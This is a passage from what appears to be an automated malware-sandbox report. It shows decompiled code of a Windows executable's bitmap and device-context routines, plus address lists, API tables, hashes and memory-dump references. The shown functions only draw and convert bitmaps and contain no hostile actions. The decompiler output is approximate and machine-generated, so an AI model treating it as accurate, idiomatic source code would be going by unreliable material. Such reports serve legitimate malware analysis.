						_push(0x4242c2);
						if(_v20 != 0) {
							_t65 = DeleteDC(_v20);
						}
						if(_v12 != 0) {
							_t66 = _v12;
							_push(_t66);
							_push(0);
							L00407124();
							return _t66;
						}
						return _t65;
					} else {
						_v32 = SelectObject(_v20, _v8);
						if(__ecx != 0x1fffffff) {
							_push(_v12);
							L00406AE4();
							_v16 = E00420B28(_v12);
							_push(_t127);
							_push(0x424273);
							_push( *[fs:eax]);
							 *[fs:eax] = _t130;
							if(_v96 == 0) {
								_v21 = 0;
							} else {
								_v21 = 1;
								_v92 = 0;
								_t107 = E004239F8(_t107, _t123, _t123, 0,  &_v116);
							}
							_v28 = SelectObject(_v16, _t107);
							if(_t123 != 0) {
								_push(0);
								_push(_t123);
								_push(_v16);
								L00406C5C();
								_push(_v16);
								L00406C2C();
								_push(0);
								_push(_t123);
								_push(_v20);
								L00406C5C();
								_push(_v20);
								L00406C2C();
							}
							_t77 = SetBkColor(_v16, _t120);
							_push(0xcc0020);
							_push(0);
							_push(0);
							_push(_v16);
							_push(_v108);
							_push(_v112);
							_push(0);
							_push(0);
							_push(_v20);
							L00406ABC();
							SetBkColor(_v16, _t77);
							if(_v28 != 0) {
								SelectObject(_v16, _v28);
							}
							if(_v21 != 0) {
								DeleteObject(_t107);
							}
							_pop(_t117);
							 *[fs:eax] = _t117;
							_push(0x42427a);
							return DeleteDC(_v16);
						} else {
							PatBlt(_v20, 0, 0, _v112, _v108, 0x42);
							if(_v32 != 0) {
								SelectObject(_v20, _v32);
							}
							goto L18;
						}
					}
				}
			}



























                                                                        0x004240c1
                                                                        0x004240c3
                                                                        0x004240c9
                                                                        0x004240cb
                                                                        0x004240cd
                                                                        0x004240d1
                                                                        0x004240d6
                                                                        0x004242cb
                                                                        0x004240f0
                                                                        0x004240f2
                                                                        0x004240f9
                                                                        0x004240fe
                                                                        0x00424103
                                                                        0x00424104
                                                                        0x00424109
                                                                        0x0042410c
                                                                        0x0042410f
                                                                        0x00424111
                                                                        0x0042411b
                                                                        0x00424121
                                                                        0x00424122
                                                                        0x0042412c
                                                                        0x0042412f
                                                                        0x00424131
                                                                        0x00424133
                                                                        0x00424138
                                                                        0x00424139
                                                                        0x0042413c
                                                                        0x0042413d
                                                                        0x00424142
                                                                        0x00424149
                                                                        0x0042428d
                                                                        0x0042428d
                                                                        0x0042428f
                                                                        0x00424292
                                                                        0x00424295
                                                                        0x0042429e
                                                                        0x004242a4
                                                                        0x004242a4
                                                                        0x004242ad
                                                                        0x004242af
                                                                        0x004242b2
                                                                        0x004242b3
                                                                        0x004242b5
                                                                        0x00000000
                                                                        0x004242b5
                                                                        0x004242ba
                                                                        0x0042414f
                                                                        0x0042415c
                                                                        0x00424165
                                                                        0x00424186
                                                                        0x00424187
                                                                        0x00424191
                                                                        0x00424196
                                                                        0x00424197
                                                                        0x0042419c
                                                                        0x0042419f
                                                                        0x004241a6
                                                                        0x004241c6
                                                                        0x004241a8
                                                                        0x004241a8
                                                                        0x004241ae
                                                                        0x004241c2
                                                                        0x004241c2
                                                                        0x004241d4
                                                                        0x004241d9
                                                                        0x004241db
                                                                        0x004241dd
                                                                        0x004241e1
                                                                        0x004241e2
                                                                        0x004241ea
                                                                        0x004241eb
                                                                        0x004241f0
                                                                        0x004241f2
                                                                        0x004241f6
                                                                        0x004241f7
                                                                        0x004241ff
                                                                        0x00424200
                                                                        0x00424200
                                                                        0x0042420a
                                                                        0x00424211
                                                                        0x00424216
                                                                        0x00424218
                                                                        0x0042421d
                                                                        0x00424221
                                                                        0x00424225
                                                                        0x00424226
                                                                        0x00424228
                                                                        0x0042422d
                                                                        0x0042422e
                                                                        0x00424238
                                                                        0x00424241
                                                                        0x0042424b
                                                                        0x0042424b
                                                                        0x00424254
                                                                        0x00424257
                                                                        0x00424257
                                                                        0x0042425e
                                                                        0x00424261
                                                                        0x00424264
                                                                        0x00424272
                                                                        0x00424167
                                                                        0x00424179
                                                                        0x0042427e
                                                                        0x00424288
                                                                        0x00424288
                                                                        0x00000000
                                                                        0x0042427e
                                                                        0x00424165
                                                                        0x00424149

                                                                        APIs
                                                                        • GetObjectA.GDI32(00000000,00000054,?), ref: 004240E3
                                                                        • 72E7AC50.USER32(00000000,00000000,004242BB,?,00000000,?,?), ref: 00424111
                                                                        • 72E7A590.GDI32(?,00000000,00000000,004242BB,?,00000000,?,?), ref: 00424122
                                                                        • 72E7A410.GDI32(?,?,00000001,00000001,00000000,?,00000000,00000000,004242BB,?,00000000,?,?), ref: 0042413D
                                                                        • SelectObject.GDI32(?,00000000), ref: 00424157
                                                                        • PatBlt.GDI32(?,00000000,00000000,?,?,00000042), ref: 00424179
                                                                        • 72E7A590.GDI32(?,?,00000000,?,?,00000001,00000001,00000000,?,00000000,00000000,004242BB,?,00000000,?,?), ref: 00424187
                                                                        • SelectObject.GDI32(00000000,00000000), ref: 004241CF
                                                                        • 72E7B410.GDI32(00000000,?,00000000,00000000,00000000,00000000,00424273,?,?,?,00000000,?,?,00000001,00000001,00000000), ref: 004241E2
                                                                        • 72E7B150.GDI32(00000000,00000000,?,00000000,00000000,00000000,00000000,00424273,?,?,?,00000000,?,?,00000001,00000001), ref: 004241EB
                                                                        • 72E7B410.GDI32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00424273,?,?,?,00000000,?), ref: 004241F7
                                                                        • 72E7B150.GDI32(?,?,?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00424273,?,?,?,00000000), ref: 00424200
                                                                        • SetBkColor.GDI32(00000000,00000000), ref: 0042420A
                                                                        • 72E897E0.GDI32(?,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020,00000000,00000000,00000000,00000000,00000000,00424273), ref: 0042422E
                                                                        • SetBkColor.GDI32(00000000,00000000), ref: 00424238
                                                                        • SelectObject.GDI32(00000000,00000000), ref: 0042424B
                                                                        • DeleteObject.GDI32(00000000), ref: 00424257
                                                                        • DeleteDC.GDI32(00000000), ref: 0042426D
                                                                        • SelectObject.GDI32(?,00000000), ref: 00424288
                                                                        • DeleteDC.GDI32(00000000), ref: 004242A4
                                                                        • 72E7B380.USER32(00000000,00000000,004242C2,00000001,00000000,?,00000000,00000000,004242BB,?,00000000,?,?), ref: 004242B5
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Object$Select$Delete$A590B150B410Color$A410B380E897
                                                                        • String ID:
                                                                        • API String ID: 4241548881-0
                                                                        • Opcode ID: 6f5505679764149f8975d96c7f15921c777c432716e7e995d3116d72c8a38ef9
                                                                        • Instruction ID: b199b53a5d34a191db7efce3f80a8b69dcc7b03c55fcec5dd27acc42e0efb18e
                                                                        • Opcode Fuzzy Hash: 6f5505679764149f8975d96c7f15921c777c432716e7e995d3116d72c8a38ef9
                                                                        • Instruction Fuzzy Hash: AC514C71F04214ABDB10EBEADC45FAFB7FCEB48704F51486AB214F7281D67899408B68
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00424EBC, Relevance: 30.1, APIs: 14, Strings: 3, Instructions: 351COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 65%
                                                                        			E00424EBC(intOrPtr __eax, void* __ebx, void* __ecx, intOrPtr* __edx, void* __edi, void* __esi, char* _a4) {
				intOrPtr _v8;
				intOrPtr* _v12;
				void* _v16;
				struct HDC__* _v20;
				char _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v37;
				intOrPtr _v44;
				void* _v48;
				struct HDC__* _v52;
				intOrPtr _v56;
				intOrPtr* _v60;
				intOrPtr* _v64;
				short _v66;
				short _v68;
				signed short _v70;
				signed short _v72;
				void* _v76;
				intOrPtr _v172;
				char _v174;
				intOrPtr _t150;
				signed int _t160;
				intOrPtr _t163;
				void* _t166;
				void* _t174;
				void* _t183;
				signed int _t188;
				intOrPtr _t189;
				struct HDC__* _t190;
				struct HDC__* _t204;
				signed int _t208;
				signed short _t214;
				intOrPtr _t241;
				intOrPtr* _t245;
				intOrPtr _t251;
				intOrPtr _t289;
				intOrPtr _t290;
				intOrPtr _t295;
				signed int _t297;
				signed int _t317;
				void* _t319;
				void* _t320;
				signed int _t321;
				void* _t322;
				void* _t323;
				void* _t324;
				intOrPtr _t325;

				_t316 = __edi;
				_t323 = _t324;
				_t325 = _t324 + 0xffffff54;
				_t319 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				_v52 = 0;
				_v44 = 0;
				_v60 = 0;
				 *((intOrPtr*)( *_v12 + 8))(__edi, __esi, __ebx, _t322);
				_v37 = _v36 == 0xc;
				if(_v37 != 0) {
					_v36 = 0x28;
				}
				_v28 = E00402754(_v36 + 0x40c);
				_v64 = _v28;
				_push(_t323);
				_push(0x4253d9);
				_push( *[fs:edx]);
				 *[fs:edx] = _t325;
				_push(_t323);
				_push(0x4253ac);
				_push( *[fs:edx]);
				 *[fs:edx] = _t325;
				if(_v37 == 0) {
					 *((intOrPtr*)( *_v12 + 8))();
					_t320 = _t319 - _v36;
					_t150 =  *((intOrPtr*)(_v64 + 0x10));
					if(_t150 != 3 && _t150 != 0) {
						_v60 = E004035AC(1);
						if(_a4 == 0) {
							E00402EF0( &_v174, 0xe);
							_v174 = 0x4d42;
							_v172 = _v36 + _t320;
							_a4 =  &_v174;
						}
						 *((intOrPtr*)( *_v60 + 0xc))();
						 *((intOrPtr*)( *_v60 + 0xc))();
						 *((intOrPtr*)( *_v60 + 0xc))();
						E00416BB4(_v60,  *_v60, _v12, _t316, _t320, _t320, 0);
						 *((intOrPtr*)( *_v60 + 0x10))();
						_v12 = _v60;
					}
				} else {
					 *((intOrPtr*)( *_v12 + 8))();
					_t251 = _v64;
					E00402EF0(_t251, 0x28);
					_t241 = _t251;
					 *(_t241 + 4) = _v72 & 0x0000ffff;
					 *(_t241 + 8) = _v70 & 0x0000ffff;
					 *((short*)(_t241 + 0xc)) = _v68;
					 *((short*)(_t241 + 0xe)) = _v66;
					_t320 = _t319 - 0xc;
				}
				_t245 = _v64;
				 *_t245 = _v36;
				_v32 = _v28 + _v36;
				if( *((short*)(_t245 + 0xc)) != 1) {
					E00420A08();
				}
				if(_v36 == 0x28) {
					_t214 =  *(_t245 + 0xe);
					if(_t214 == 0x10 || _t214 == 0x20) {
						if( *((intOrPtr*)(_t245 + 0x10)) == 3) {
							E00416B44(_v12, 0xc, _v32);
							_v32 = _v32 + 0xc;
							_t320 = _t320 - 0xc;
						}
					}
				}
				if( *(_t245 + 0x20) == 0) {
					 *(_t245 + 0x20) = E00420C98( *(_t245 + 0xe));
				}
				_t317 = _v37 & 0x000000ff;
				_t257 =  *(_t245 + 0x20) * 0;
				E00416B44(_v12,  *(_t245 + 0x20) * 0, _v32);
				_t321 = _t320 -  *(_t245 + 0x20) * 0;
				if( *(_t245 + 0x14) == 0) {
					_t297 =  *(_t245 + 0xe) & 0x0000ffff;
					_t208 = E00420CB8( *((intOrPtr*)(_t245 + 4)), 0x20, _t297);
					asm("cdq");
					_t257 = _t208 * (( *(_t245 + 8) ^ _t297) - _t297);
					 *(_t245 + 0x14) = _t208 * (( *(_t245 + 8) ^ _t297) - _t297);
				}
				_t160 =  *(_t245 + 0x14);
				if(_t321 > _t160) {
					_t321 = _t160;
				}
				if(_v37 != 0) {
					_t160 = E00420F60(_v32);
				}
				_push(0);
				L00406EB4();
				_v16 = E00420B28(_t160);
				_push(_t323);
				_push(0x425327);
				_push( *[fs:edx]);
				 *[fs:edx] = _t325;
				_t163 =  *((intOrPtr*)(_v64 + 0x10));
				if(_t163 == 0 || _t163 == 3) {
					if( *0x47a514 == 0) {
						_push(0);
						_push(0);
						_push( &_v24);
						_push(0);
						_push(_v28);
						_t166 = _v16;
						_push(_t166);
						L00406AEC();
						_v44 = _t166;
						if(_v44 == 0 || _v24 == 0) {
							if(GetLastError() != 0) {
								E0040B330(_t245, _t257, _t317, _t321);
							} else {
								E00420A08();
							}
						}
						_push(_t323);
						_push( *[fs:eax]);
						 *[fs:eax] = _t325;
						E00416B44(_v12, _t321, _v24);
						_pop(_t289);
						 *[fs:eax] = _t289;
						_t290 = 0x4252f6;
						 *[fs:eax] = _t290;
						_push(E0042532E);
						_t174 = _v16;
						_push(_t174);
						_push(0);
						L00407124();
						return _t174;
					} else {
						goto L27;
					}
				} else {
					L27:
					_v20 = 0;
					_v24 = E00402754(_t321);
					_push(_t323);
					_push(0x42528f);
					_push( *[fs:edx]);
					 *[fs:edx] = _t325;
					_t263 = _t321;
					E00416B44(_v12, _t321, _v24);
					_push(_v16);
					L00406AE4();
					_v20 = E00420B28(_v16);
					_push(1);
					_push(1);
					_t183 = _v16;
					_push(_t183);
					L00406ADC();
					_v48 = SelectObject(_v20, _t183);
					_v56 = 0;
					_t188 =  *(_v64 + 0x20);
					if(_t188 > 0) {
						_t263 = _t188;
						_v52 = E00421218(0, _t188);
						_push(0);
						_push(_v52);
						_t204 = _v20;
						_push(_t204);
						L00406C5C();
						_v56 = _t204;
						_push(_v20);
						L00406C2C();
					}
					_push(_t323);
					_push(0x425263);
					_push( *[fs:edx]);
					 *[fs:edx] = _t325;
					_push(0);
					_t189 = _v28;
					_push(_t189);
					_push(_v24);
					_push(4);
					_push(_t189);
					_t190 = _v20;
					_push(_t190);
					L00406AF4();
					_v44 = _t190;
					if(_v44 == 0) {
						if(GetLastError() != 0) {
							E0040B330(_t245, _t263, _t317, _t321);
						} else {
							E00420A08();
						}
					}
					_pop(_t295);
					 *[fs:eax] = _t295;
					_push(E0042526A);
					if(_v56 != 0) {
						_push(0xffffffff);
						_push(_v56);
						_push(_v20);
						L00406C5C();
					}
					return DeleteObject(SelectObject(_v20, _v48));
				}
			}




















































                                                                        0x00424ebc
                                                                        0x00424ebd
                                                                        0x00424ebf
                                                                        0x00424ec8
                                                                        0x00424eca
                                                                        0x00424ecd
                                                                        0x00424ed2
                                                                        0x00424ed7
                                                                        0x00424edc
                                                                        0x00424eec
                                                                        0x00424ef3
                                                                        0x00424efb
                                                                        0x00424efd
                                                                        0x00424efd
                                                                        0x00424f14
                                                                        0x00424f1a
                                                                        0x00424f1f
                                                                        0x00424f20
                                                                        0x00424f25
                                                                        0x00424f28
                                                                        0x00424f2d
                                                                        0x00424f2e
                                                                        0x00424f33
                                                                        0x00424f36
                                                                        0x00424f3d
                                                                        0x00424f9c
                                                                        0x00424f9f
                                                                        0x00424fa5
                                                                        0x00424fab
                                                                        0x00424fc5
                                                                        0x00424fcc
                                                                        0x00424fdb
                                                                        0x00424fe0
                                                                        0x00424fee
                                                                        0x00424ffa
                                                                        0x00424ffa
                                                                        0x0042500a
                                                                        0x0042501a
                                                                        0x0042502e
                                                                        0x0042503d
                                                                        0x0042504f
                                                                        0x00425055
                                                                        0x00425055
                                                                        0x00424f3f
                                                                        0x00424f4f
                                                                        0x00424f52
                                                                        0x00424f5e
                                                                        0x00424f63
                                                                        0x00424f69
                                                                        0x00424f70
                                                                        0x00424f77
                                                                        0x00424f7f
                                                                        0x00424f83
                                                                        0x00424f83
                                                                        0x00425058
                                                                        0x0042505e
                                                                        0x00425066
                                                                        0x0042506e
                                                                        0x00425070
                                                                        0x00425070
                                                                        0x00425079
                                                                        0x0042507b
                                                                        0x00425083
                                                                        0x0042508f
                                                                        0x0042509c
                                                                        0x004250a1
                                                                        0x004250a5
                                                                        0x004250a5
                                                                        0x0042508f
                                                                        0x00425083
                                                                        0x004250ac
                                                                        0x004250b7
                                                                        0x004250b7
                                                                        0x004250bd
                                                                        0x004250c9
                                                                        0x004250d2
                                                                        0x004250e4
                                                                        0x004250ea
                                                                        0x004250ec
                                                                        0x004250f8
                                                                        0x00425102
                                                                        0x00425107
                                                                        0x0042510a
                                                                        0x0042510a
                                                                        0x0042510d
                                                                        0x00425112
                                                                        0x00425114
                                                                        0x00425114
                                                                        0x0042511a
                                                                        0x0042511f
                                                                        0x0042511f
                                                                        0x00425124
                                                                        0x00425126
                                                                        0x00425130
                                                                        0x00425135
                                                                        0x00425136
                                                                        0x0042513b
                                                                        0x0042513e
                                                                        0x00425144
                                                                        0x00425149
                                                                        0x00425157
                                                                        0x00425296
                                                                        0x00425298
                                                                        0x0042529d
                                                                        0x0042529e
                                                                        0x004252a3
                                                                        0x004252a4
                                                                        0x004252a7
                                                                        0x004252a8
                                                                        0x004252ad
                                                                        0x004252b4
                                                                        0x004252c3
                                                                        0x004252cc
                                                                        0x004252c5
                                                                        0x004252c5
                                                                        0x004252c5
                                                                        0x004252c3
                                                                        0x004252d3
                                                                        0x004252d9
                                                                        0x004252dc
                                                                        0x004252e7
                                                                        0x004252ee
                                                                        0x004252f1
                                                                        0x00425310
                                                                        0x00425313
                                                                        0x00425316
                                                                        0x0042531b
                                                                        0x0042531e
                                                                        0x0042531f
                                                                        0x00425321
                                                                        0x00425326
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0042515d
                                                                        0x0042515d
                                                                        0x0042515f
                                                                        0x00425169
                                                                        0x0042516e
                                                                        0x0042516f
                                                                        0x00425174
                                                                        0x00425177
                                                                        0x0042517d
                                                                        0x00425182
                                                                        0x0042518a
                                                                        0x0042518b
                                                                        0x00425195
                                                                        0x00425198
                                                                        0x0042519a
                                                                        0x0042519c
                                                                        0x0042519f
                                                                        0x004251a0
                                                                        0x004251af
                                                                        0x004251b4
                                                                        0x004251ba
                                                                        0x004251bf
                                                                        0x004251c1
                                                                        0x004251cd
                                                                        0x004251d0
                                                                        0x004251d5
                                                                        0x004251d6
                                                                        0x004251d9
                                                                        0x004251da
                                                                        0x004251df
                                                                        0x004251e5
                                                                        0x004251e6
                                                                        0x004251e6
                                                                        0x004251ed
                                                                        0x004251ee
                                                                        0x004251f3
                                                                        0x004251f6
                                                                        0x004251f9
                                                                        0x004251fb
                                                                        0x004251fe
                                                                        0x00425202
                                                                        0x00425203
                                                                        0x00425205
                                                                        0x00425206
                                                                        0x00425209
                                                                        0x0042520a
                                                                        0x0042520f
                                                                        0x00425216
                                                                        0x0042521f
                                                                        0x00425228
                                                                        0x00425221
                                                                        0x00425221
                                                                        0x00425221
                                                                        0x0042521f
                                                                        0x0042522f
                                                                        0x00425232
                                                                        0x00425235
                                                                        0x0042523e
                                                                        0x00425240
                                                                        0x00425245
                                                                        0x00425249
                                                                        0x0042524a
                                                                        0x0042524a
                                                                        0x00425262
                                                                        0x00425262

                                                                        APIs
                                                                        • 72E7AC50.USER32(00000000,?,00000000,004253D9,?,?), ref: 00425126
                                                                        • 72E7A590.GDI32(00000001,00000000,0042528F,?,00000000,00425327,?,00000000,?,00000000,004253D9,?,?), ref: 0042518B
                                                                        • 72E7A520.GDI32(00000001,00000001,00000001,00000001,00000000,0042528F,?,00000000,00425327,?,00000000,?,00000000,004253D9,?,?), ref: 004251A0
                                                                        • SelectObject.GDI32(?,00000000), ref: 004251AA
                                                                        • 72E7B410.GDI32(?,?,00000000,?,00000000,00000001,00000001,00000001,00000001,00000000,0042528F,?,00000000,00425327,?,00000000), ref: 004251DA
                                                                        • 72E7B150.GDI32(?,?,?,00000000,?,00000000,00000001,00000001,00000001,00000001,00000000,0042528F,?,00000000,00425327), ref: 004251E6
                                                                        • 72E7A7F0.GDI32(?,?,00000004,00000000,?,00000000,00000000,00425263,?,?,00000000,00000001,00000001,00000001,00000001,00000000), ref: 0042520A
                                                                        • GetLastError.KERNEL32(?,?,00000004,00000000,?,00000000,00000000,00425263,?,?,00000000,00000001,00000001,00000001,00000001,00000000), ref: 00425218
                                                                        • 72E7B410.GDI32(?,00000000,000000FF,0042526A,00000000,?,00000000,00000000,00425263,?,?,00000000,00000001,00000001,00000001,00000001), ref: 0042524A
                                                                        • SelectObject.GDI32(?,?), ref: 00425257
                                                                        • DeleteObject.GDI32(00000000), ref: 0042525D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Object$B410Select$A520A590B150DeleteErrorLast
                                                                        • String ID: ($BM$x#A
                                                                        • API String ID: 3415089252-1550879612
                                                                        • Opcode ID: b91efd67f6c95568d4d1e3cc61e066766e2b2bd289b766a2555f1655cfd9dfd3
                                                                        • Instruction ID: 3b266c622e7d5c61ee199f7101d8b2b068e3375d9a97a10e13efc2d829a2294f
                                                                        • Opcode Fuzzy Hash: b91efd67f6c95568d4d1e3cc61e066766e2b2bd289b766a2555f1655cfd9dfd3
                                                                        • Instruction Fuzzy Hash: 6FD14C70B002189FDF04DFA9D885BAEBBF5EF49304F51846AE905EB395D7389840CB69
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0046745C, Relevance: 28.5, APIs: 15, Strings: 1, Instructions: 468COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 55%
                                                                        			E0046745C(intOrPtr __eax, char __edx) {
				intOrPtr _v8;
				char _v9;
				intOrPtr* _v16;
				intOrPtr* _v20;
				intOrPtr* _v24;
				intOrPtr _v28;
				char _v44;
				char _v60;
				void* __edi;
				void* __ebp;
				signed int _t170;
				signed int _t176;
				void* _t209;
				void* _t213;
				intOrPtr _t218;
				intOrPtr _t241;
				void* _t254;
				void* _t325;
				void* _t345;
				void* _t361;
				void* _t368;
				intOrPtr _t382;
				intOrPtr _t388;
				struct HDC__* _t392;
				struct HDC__* _t393;
				struct HDC__* _t394;
				void* _t421;
				void* _t422;
				void* _t423;
				intOrPtr _t447;
				intOrPtr _t464;
				void* _t478;
				signed int _t486;
				void* _t491;
				void* _t493;
				void* _t495;
				intOrPtr _t496;
				void* _t506;

				_t493 = _t495;
				_t496 = _t495 + 0xffffffc8;
				_v9 = __edx;
				_v8 = __eax;
				if(_v9 == 2 &&  *(_v8 + 0x20) < 3) {
					_v9 = 0;
				}
				_t388 =  *((intOrPtr*)(_v8 + 0xc));
				if(_t388 != 0xffffffff) {
					L24:
					return _t388;
				} else {
					_t170 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 4)))) + 0x2c))();
					if((_t170 |  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 4)))) + 0x20))()) == 0) {
						goto L24;
					} else {
						_t176 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 4)))) + 0x2c))();
						asm("cdq");
						_t486 = _t176 / ( *(_v8 + 0x20) & 0x000000ff);
						_t491 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 4)))) + 0x20))();
						if( *((intOrPtr*)(_v8 + 8)) == 0) {
							_t503 =  *0x47ac64;
							if( *0x47ac64 == 0) {
								 *0x47ac64 = E00467150(1);
							}
							_t382 =  *0x47ac64; // 0x0
							 *((intOrPtr*)(_v8 + 8)) = E004671C4(_t382, _t491, _t486);
						}
						_v16 = E004242CC(1);
						 *[fs:eax] = _t496;
						 *((intOrPtr*)( *_v16 + 0x40))( *[fs:eax], 0x467a0b, _t493);
						 *((intOrPtr*)( *_v16 + 0x34))();
						E00412BCC(_t486, 0,  &_v44, _t491);
						E0041FC50( *((intOrPtr*)(E00424894(_v16) + 0x14)), _t486, 0x8000000f, _t486, _t493, _t503);
						E0042405C( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 4)))) + 0x24))());
						 *((intOrPtr*)( *_v16 + 0x38))();
						if(_v9 >=  *(_v8 + 0x20)) {
						}
						E00412BCC(1 * _t486, 0,  &_v60, _t491);
						_t209 = _v9 - 1;
						_t506 = _t209;
						if(_t506 < 0) {
							L14:
							_push( &_v60);
							_t213 = E00424894( *((intOrPtr*)(_v8 + 4)));
							E00420180(E00424894(_v16),  &_v44, _t507, _t213);
							_t218 =  *((intOrPtr*)(_v8 + 4));
							_t508 =  *((char*)(_t218 + 0x38)) - 1;
							if( *((char*)(_t218 + 0x38)) != 1) {
								 *((intOrPtr*)(_v8 + 0xc)) = E004670F4( *((intOrPtr*)(_v8 + 8)), 0x20000000, _v16, __eflags);
							} else {
								 *((intOrPtr*)(_v8 + 0xc)) = E004670F4( *((intOrPtr*)(_v8 + 8)),  *((intOrPtr*)(_v8 + 0x1c)), _v16, _t508);
							}
							goto L23;
						} else {
							if(_t506 == 0) {
								_v24 = 0;
								_v20 = 0;
								 *[fs:eax] = _t496;
								_v24 = E004242CC(1);
								_v20 = E004242CC(1);
								 *((intOrPtr*)( *_v20 + 8))( *[fs:eax], 0x4679cf, _t493);
								 *((intOrPtr*)( *_v20 + 0x6c))();
								_t241 = _v8;
								__eflags =  *((char*)(_t241 + 0x20)) - 1;
								if( *((char*)(_t241 + 0x20)) <= 1) {
									 *((intOrPtr*)( *_v24 + 8))();
									 *((intOrPtr*)( *_v24 + 0x6c))();
									E0041FC50( *((intOrPtr*)(E00424894(_v24) + 0x14)),  *_v24, 0, _t486, _t493, __eflags);
									_t415 =  *_v24;
									 *((intOrPtr*)( *_v24 + 0x40))();
									_t254 = E00424950(_v24);
									__eflags = _t254;
									if(_t254 != 0) {
										E0041F464( *((intOrPtr*)(E00424894(_v24) + 0xc)), 0xffffff);
										__eflags = 0;
										E004256E4(_v24, 0);
										E0041FC50( *((intOrPtr*)(E00424894(_v24) + 0x14)), _t415, 0xffffff, _t486, _t493, __eflags);
									}
									E004256E4(_v24, 1);
									_t391 = E00424894(_v16);
									E0041FC50( *((intOrPtr*)(_t258 + 0x14)), _t415, 0x8000000f, _t486, _t493, __eflags);
									E004202E8(_t258,  &_v44);
									E0041FC50( *((intOrPtr*)(_t258 + 0x14)), _t415, 0x80000014, _t486, _t493, __eflags);
									SetTextColor(E00420730(_t391), 0);
									SetBkColor(E00420730(_t391), 0xffffff);
									_push(0xe20746);
									_push(0);
									_push(0);
									_push(E00420730(E00424894(_v24)));
									_push(_t491);
									_push(_t486);
									_push(1);
									_push(1);
									_push(E00420730(_t391));
									L00406ABC();
									E0041FC50( *((intOrPtr*)(_t391 + 0x14)), _t415, 0x80000010, _t486, _t493, __eflags);
									SetTextColor(E00420730(_t391), 0);
									SetBkColor(E00420730(_t391), 0xffffff);
									_push(0xe20746);
									_push(0);
									_push(0);
									_push(E00420730(E00424894(_v24)));
									_push(_t491);
									_push(_t486);
									_push(0);
									_push(0);
									_push(E00420730(_t391));
									L00406ABC();
								} else {
									_v28 = E00424894(_v16);
									E00424894(_v20);
									E00420180(_v28,  &_v44, __eflags,  &_v60);
									E004256E4(_v24, 1);
									 *((intOrPtr*)( *_v24 + 0x40))();
									 *((intOrPtr*)( *_v24 + 0x34))();
									E0041FC50( *((intOrPtr*)(E00424894(_v20) + 0x14)),  *_v24, 0xffffff, _t486, _t493, __eflags);
									_push( &_v60);
									_push(E00424894(_v20));
									_t325 = E00424894(_v24);
									_pop(_t421);
									E00420180(_t325,  &_v44, __eflags);
									E0041FC50( *((intOrPtr*)(_v28 + 0x14)), _t421, 0x80000014, _t486, _t493, __eflags);
									_t392 = E00420730(_v28);
									SetTextColor(_t392, 0);
									SetBkColor(_t392, 0xffffff);
									_push(0xe20746);
									_push(0);
									_push(0);
									_push(E00420730(E00424894(_v24)));
									_push(_t491);
									_push(_t486);
									_push(0);
									_push(0);
									_push(_t392);
									L00406ABC();
									E0041FC50( *((intOrPtr*)(E00424894(_v20) + 0x14)), _t421, 0x808080, _t486, _t493, __eflags);
									_push( &_v60);
									_push(E00424894(_v20));
									_t345 = E00424894(_v24);
									_pop(_t422);
									E00420180(_t345,  &_v44, __eflags);
									E0041FC50( *((intOrPtr*)(_v28 + 0x14)), _t422, 0x80000010, _t486, _t493, __eflags);
									_t393 = E00420730(_v28);
									SetTextColor(_t393, 0);
									SetBkColor(_t393, 0xffffff);
									_push(0xe20746);
									_push(0);
									_push(0);
									_push(E00420730(E00424894(_v24)));
									_push(_t491);
									_push(_t486);
									_push(0);
									_push(0);
									_push(_t393);
									L00406ABC();
									_push(E0041EFA4( *((intOrPtr*)(_v8 + 0x1c))));
									_t361 = E00424894(_v20);
									_pop(_t478);
									E0041FC50( *((intOrPtr*)(_t361 + 0x14)), _t422, _t478, _t486, _t493, __eflags);
									_push( &_v60);
									_push(E00424894(_v20));
									_t368 = E00424894(_v24);
									_pop(_t423);
									E00420180(_t368,  &_v44, __eflags);
									E0041FC50( *((intOrPtr*)(_v28 + 0x14)), _t423, 0x8000000f, _t486, _t493, __eflags);
									_t394 = E00420730(_v28);
									SetTextColor(_t394, 0);
									SetBkColor(_t394, 0xffffff);
									_push(0xe20746);
									_push(0);
									_push(0);
									_push(E00420730(E00424894(_v24)));
